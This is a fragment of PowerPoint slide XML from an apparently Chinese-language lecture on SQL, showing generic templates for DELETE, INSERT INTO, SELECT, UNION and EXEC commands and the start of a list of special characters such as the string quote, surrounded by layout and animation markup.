              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56743FE8-34B7-412F-8388-B12FC73FB6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1172791" y="2680226"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B16B34-83DC-48FD-9A4C-4FE0C61A8CDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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8" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B09E43B-D973-4BD4-9F6C-D4A554C18839}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3322424" y="2063504"/>
              <a:ext cx="1185634" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>DELETE</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68C5702-B8FD-4A2A-888D-F0A7DC405A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3533747" y="2722465"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957139" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F8C25F-76B3-4B07-A0FC-7057DDA3AB8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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BACBB391-828B-4972-95AA-024FCDE56B20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4957139" y="2063504"/>
              <a:ext cx="3075935" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>从数据库表中删除数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6538B41E-0B0C-4BDF-AB6A-57C84EC0328D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6767649" y="2674209"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5CA87A-5532-4AB5-AA30-0B92D6F7C2C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1092F1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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4" name="矩形 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C940B97-1A9D-47F1-B8EA-FEE05B03F298}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2999129" y="2063504"/>
              <a:ext cx="1883560" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>INSERT INTO </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622B0685-BF60-40C4-9ED0-BB2575227019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9128607" y="2716448"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56677E7E-BD86-4F7F-A617-D41F43A22158}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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DF8F5701-F884-48A7-BA1B-CA1F87258DB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4957141" y="2063504"/>
              <a:ext cx="3075935" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>向数据库表中插入数据</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C8ECCB-40E8-46F1-AFB0-AA7D57193F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187500" y="4416485"/>
            <a:ext cx="10464094" cy="1652141"/>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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pP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SELECT [column-names] FROM [table-name];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pP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[select-statement] UNION [select-statement];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pP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EXEC [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sql</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-command-name][arguments to command]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E8F00C-BF92-47B4-B845-C9CF5CCB4796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187501" y="3832349"/>
            <a:ext cx="2990900" cy="576064"/>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prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>几个关键的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3597653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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="2" presetClass="entr" presetSubtype="8" decel="60000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" decel="60000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="50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3604345" y="837929"/>
            <a:ext cx="5650060" cy="474140"/>
            <a:chOff x="4336653" y="837929"/>
            <a:chExt cx="4185441"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4336653" y="837929"/>
              <a:ext cx="4185441" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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需要使用一些特殊的字符来构建</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语句</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBAD0E8-D9A0-4669-8BA6-6ACAA06408EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3153005" y="2039753"/>
            <a:ext cx="6552739" cy="4002532"/>
            <a:chOff x="4197127" y="2392189"/>
            <a:chExt cx="6552739" cy="4002532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8496A495-CB61-4BF2-95E5-F5590CD0DD35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392189"/>
              <a:ext cx="6137398" cy="3786507"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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151A336F-4C83-4376-BA73-8B4A75F030E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4413151" y="2608214"/>
              <a:ext cx="6336715" cy="3786507"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="25400">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4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F446EB65-54E9-455B-B0F0-C3437F531B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568347" y="2745057"/>
            <a:ext cx="6137397" cy="2807948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>’ ’   字符串指示器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
